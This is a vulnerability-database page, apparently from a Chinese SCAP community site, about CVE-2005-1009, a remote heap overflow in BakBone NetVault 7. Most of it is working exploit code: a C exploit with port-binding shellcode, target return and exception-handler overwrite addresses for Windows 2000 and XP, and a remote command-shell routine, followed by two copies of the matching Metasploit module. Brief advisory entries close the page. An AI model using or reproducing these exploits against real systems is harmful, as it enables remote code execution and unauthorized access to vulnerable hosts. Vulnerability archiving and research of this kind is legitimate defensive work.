long gimmeip(char *hostname);
char buffer[40000];
//initial request to host
char packet[]=
"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00\x00\x69"
"\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42\x00\x01"
"\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x10"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97\xF0\xCA"
"\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04\x02\x4E"
"\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC\xFA\x8E"
"\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01\x02";
//class101 modified shellcode from metasploit.com. yummy.
char shellcode[]=
	"\x33\xC9\x83\xE9\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
	"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
	"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
	"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
	"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
	"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
	"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
	"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
	"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
	"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
	"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
	"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
	"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
	"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
	"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
	"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
	"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
	"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
	"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
	"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
	"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02" 
	"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";

char jmpToXP[]="\xBD\x9B\x36\x7C"; //XP SP1
char uefOverWriteXP[]="\xB4\x73\xED\x77";//XP SP1
char jmpTo2K[]="\x7E\x6D\x03\x75";  //2k SP4
char uefOverWrite2K[]="\x4C\x14\x54\x7C";  //2K SP4

int main(int argc,char *argv[])
{     
		WSADATA wsaData;
		struct sockaddr_in targetTCP;
		int sockTCP,s;
		unsigned short port = 20031;
		long ip;
		if(argc < 3)
		{
			
			printf("Bakbone Netvault Remote Heap Overflow.\n"
				"Usage: %s [Target] [address] <port>\n"
				" eg: netvault.exe 1 127.0.0.1\n"
				"Targets\n1. Windows 2000\n2. Windows XP SP0-1\n"
					"Coded by nolimit@CiSO and BuzzDee.\n",argv[0]);
			return 1;			
		}		
		if(argc==4)
			port = atoi(argv[3]);					
        WSAStartup(0x0202, &wsaData);				
		printf("[*] Target:\t%s \tPort: %d\n\n",argv[2],port);
		ip=gimmeip(argv[2]);	
        targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(port);
		memset(buffer,'\x90',40000);
		memcpy(buffer,packet,sizeof(packet)-1); //request packet
		memcpy(buffer+32790,"\xEB\x0C",2); //JMP ahead over the 2 overwrites
		switch(atoi(argv[1]))
		{
			case 1:
			printf("Targetting 2K..\n");
			memcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]
			memcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.
			break;
			case 2:
			printf("Targetting XP..\n");
			memcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL [EDI+74]
			memcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.
			break;
			default:
			printf("Error target not found.\n");
			return 1;
			break;
		}
		memcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p
		memcpy(buffer+39947,"\x00\x00\x00",3); //all done! only 39950 bytes! ;P
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		printf("[*] Socket initialized...\n");					
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 		
		printf("[*] Sending  buffer.\n");
		Sleep(1000);
		if (send(sockTCP, buffer, 39950,0) == -1)
		{
				printf("[x] Failed to inject packet! Exiting...\n");
				WSACleanup();
                return 1;
		}		
		printf("[*] Sleeping.");
		for(s=0;s<8;s++)
		{ //wait for it to catch
			printf(".");
			Sleep(500);
		}
		closesocket(sockTCP);
		for(s=0;s<5;s++)
		{
			printf(".");
			Sleep(500);
		} //exploit triggers when you reconnect sometimes
		printf("\n[*] Connecting again to trigger overflow..\n");
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{ 
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 		
		Sleep(500);
		closesocket(sockTCP);
				
		printf("[*] Connecting to host: %s on port 101\n",argv[2]);
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		targetTCP.sin_port= htons(101);
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 		
		printf("[*] Exploit worked! dropping into shell\n");
		cmdshell(sockTCP);
		WSACleanup();
		exit(1);
		return 0;
}
/*
Taken from some random exploit.
good, simple cmdshell function.
*/
void cmdshell (int sock)
{
 struct timeval tv;
 int length;
 unsigned long o[2];
 char buffer[1000];
 
 tv.tv_sec = 1;
 tv.tv_usec = 0;

 while (1) 
 {
	o[0] = 1;
	o[1] = sock;	

	length = select (0, (fd_set *)&o, NULL, NULL, &tv);
	if(length == 1)
	{
		length = recv (sock, buffer, sizeof (buffer), 0);
		if (length <= 0) 
		{
			printf ("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
		length = write (1, buffer, length);
		if (length <= 0) 
		{
			printf ("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
	}
	else
	{
    	length = read (0, buffer, sizeof (buffer));
		if (length <= 0) 
		{
			printf("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
		length = send(sock, buffer, length, 0);
		if (length <= 0) 
		{
			printf("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
	}
}

}
/*********************************************************************************/
long gimmeip(char *hostname) 
{
	struct hostent *he;
	long ipaddr;
	
	if ((ipaddr = inet_addr(hostname)) < 0) 
	{
		if ((he = gethostbyname(hostname)) == NULL) 
		{
			printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
			WSACleanup();
			exit(1);
		}
		memcpy(&ipaddr, he->h_addr, he->h_length);
	}	
	return ipaddr;
}
/*********************************************************************************/

// milw0rm.com [2005-05-17]
		

- 漏洞信息 (16448)

BakBone NetVault Remote Heap Overflow (EDBID:16448)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BakBone NetVault Remote Heap Overflow',
			'Description'    => %q{
		This module exploits a heap overflow in the BakBone NetVault
	Process Manager service. This code is a direct port of the netvault.c
	code written by nolimit and BuzzDee.
			},
			'Author'         => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-1009'],
					['OSVDB', '15234'],
					['BID', '12967'],
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x20",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
					['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
				],

			'Privileged'     => false,
			'DisclosureDate' => 'Apr 01 2005'
			))

			register_options(
			[
				Opt::RPORT(20031)
			], self.class)
	end

	def check
		connect

		hname = "METASPLOIT"
		probe =
			"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
			"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
			"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +
			"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +
			[ hname.length + 1 ].pack('V') + hname + "\x00"
		probe += "\x00" * (201 - probe.length)

		sock.put(probe)
		res = sock.get_once(1, 10)

		off = (res || '').index("NVBuild")

		if off
			off += 21
			ver  = res[off + 4, res[off, 4].unpack('V')[0]].to_i

			if ver > 0
				print_status("Detected NetVault Build #{ver}")
				return Exploit::CheckCode::Detected
			end
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name}...")

		head =
			"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
			"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
			"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
			"\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +
			"\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +
			"\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +
			"\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +
			"\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +
			"\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +
			"\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +
			"\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

		pattern = make_nops(39947) + "\x00\x00\x00"
		p       = payload.encoded

		pattern[0, head.length]  = head
		pattern[32790, 2]        = "\xeb\x0a"
		pattern[32792, 4]        = [ target.ret ].pack('V')
		pattern[32796, 4]        = [ target['UEF'] ].pack('V')
		pattern[32800, p.length] = p

		sent = 0
		try  = 0

		15.times {
			try += 1
			connect
			sent = sock.put(pattern)
			disconnect
			break if sent == pattern.length
		}

		if (try == 15)
			print_error("Could not write full packet to server.")
			return
		end

		print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
		select(nil,nil,nil,4)

		print_status("Attempting to trigger memory overwrite by reconnecting...")

		begin
			10.times { |x|
				connect
				sock.put(pattern)
				print_status("   Completed connection #{x}")
				sock.get_once(1, 1)
				disconnect
			}
		rescue
		end

		print_status("Waiting for payload to execute...")

		handler
		disconnect
	end

	def wfs_delay
		5
	end

end

		

- 漏洞信息 (F83217)

BakBone NetVault Remote Heap Overflow (PacketStormID:F83217)
2009-11-26 00:00:00
H D Moore,nolimit  metasploit.com
exploit,overflow
CVE-2005-1009
[点击下载]

This Metasploit module exploits a heap overflow in the BakBone NetVault Process Manager service. This code is a direct port of the netvault.c code written by nolimit and BuzzDee.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BakBone NetVault Remote Heap Overflow',
			'Description'    => %q{
		This module exploits a heap overflow in the BakBone NetVault
	Process Manager service. This code is a direct port of the netvault.c
	code written by nolimit and BuzzDee.
			},
			'Author'         => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2005-1009'],
					['OSVDB', '15234'],
					['BID', '12967'],
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x20",
	      		'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],  
					['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],  
				],

			'Privileged'     => false,
			'DisclosureDate' => 'Apr 01 2005'
			))

			register_options(
			[
				Opt::RPORT(20031)
			], self.class)
	end

	def check
		connect

		hname = "METASPLOIT"
		probe = 
			"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
			"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
			"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +
			"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +
			[ hname.length + 1 ].pack('V') + hname + "\x00"
		probe += "\x00" * (201 - probe.length)

		sock.put(probe)
		res = sock.get_once(1, 10)

		off = (res || '').index("NVBuild")

		if off
			off += 21
			ver  = res[off + 4, res[off, 4].unpack('V')[0]].to_i

			if ver > 0
				print_status("Detected NetVault Build #{ver}")
				return Exploit::CheckCode::Detected
			end
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name}...")

		head = 
			"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
			"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
			"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
			"\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +
			"\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +
			"\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +
			"\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +
			"\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +
			"\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +
			"\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +
			"\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

		pattern = make_nops(39947) + "\x00\x00\x00"
		p       = payload.encoded

		pattern[0, head.length]  = head
		pattern[32790, 2]        = "\xeb\x0a"
		pattern[32792, 4]        = [ target.ret ].pack('V')
		pattern[32796, 4]        = [ target['UEF'] ].pack('V')
		pattern[32800, p.length] = p

		sent = 0
		try  = 0

		15.times { 
			try += 1
			connect
			sent = sock.put(pattern)
			disconnect
			break if sent == pattern.length
		}

		if (try == 15)
			print_error("Could not write full packet to server.")
			return
		end

		print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
		sleep(4)

		print_status("Triggering memory overwrite by reconnecting...")

		begin
			10.times { |x|
				connect
				sock.put(pattern)
				print_status("   Completed connection #{x}")
				sock.get_once(1, 1)
				disconnect
			}
		rescue
		end

		print_status("Waiting for payload to execute...")

		handler
		disconnect	
	end

	def wfs_delay
		5
	end

end
    

- 漏洞信息

15233
BakBone NetVault configure.cfg Name= Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-04-01 Unknow
2005-04-01 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

BakBone NetVault Remote Heap Overflow Vulnerability
Boundary Condition Error 12967
Yes No
2005-04-01 12:00:00 2009-07-12 11:56:00
Discovery is credited to Hat-Squad Security Team <bugtraq@hat-squad.com>.

- 受影响的程序版本

BakBone NetVault 7.1
BakBone NetVault 7.0

- 漏洞讨论

NetVault is reported prone to a remote heap overflow vulnerability.

A successful attack can allow remote attackers to execute arbitrary code on a vulnerable computer to gain unauthorized access.

This issue has been confirmed in NetVault 7 packages running on Windows platforms. Other versions of NetVault running on different platforms may be affected as well.

- 漏洞利用

An exploit targeting the application running on Windows is available (101_netvault.cpp). An exploit has also been released for the Metasploit Framework (bakbone_netvault_heap.pm).

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站